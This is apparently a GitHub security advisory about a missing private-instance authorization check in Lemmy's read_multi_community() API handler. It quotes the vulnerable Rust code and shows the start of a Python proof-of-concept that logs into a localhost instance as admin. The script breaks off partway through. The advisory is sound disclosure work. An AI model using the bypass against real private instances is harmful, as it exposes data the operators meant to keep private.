GHSA-jmxc-hhwx-gvv3 MEDIUM rust/lemmy_api

CVE:

Summary

read_multi_community() does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists.

Details

Other read handlers load local_site and call check_private_instance() before returning data to unauthenticated callers. read_multi_community() does not call that helper:

pub async fn read_multi_community(
  Query(data): Query<GetMultiCommunity>,
  context: Data<LemmyContext>,
  local_user_view: Option<LocalUserView>,
) -> LemmyResult<Json<GetMultiCommunityResponse>> {
  let my_person_id = local_user_view.as_ref().map(|l| l.person.id);
  let id = resolve_multi_community_identifier(&data.name, data.id, &context, &local_user_view)
    .await?
    .ok_or(LemmyErrorType::NoIdGiven)?;
  let multi_community_view =
    MultiCommunityView::read(&mut context.pool(), id, my_person_id).await?;

get_community(), list_posts(), list_comments(), read_person(), search(), and resolve_object() all enforce the private-instance guard.

Proof of Concept

The script creates a multi-community whose metadata contains a marker, turns on private_instance, confirms a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over GET /multi_community without authentication.

#!/usr/bin/env python3
import json, random, string
import requests

BASE       = "http://127.0.0.1:8536/api/v4"
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"

def api(method, path, token=None, **kw):
    h = kw.pop("headers", {})
    if token: h["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=h, **kw)

suffix = "multi" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
secret = "SECRET_MULTI_" + suffix

admin = api("POST", "/account/auth/login", json={"username_or_email": ADMIN_USER, "password": ADMIN_PASS}).json()["jwt"]

# Create

📌 来源: GitHub-Advisory | 📅 2026-05-06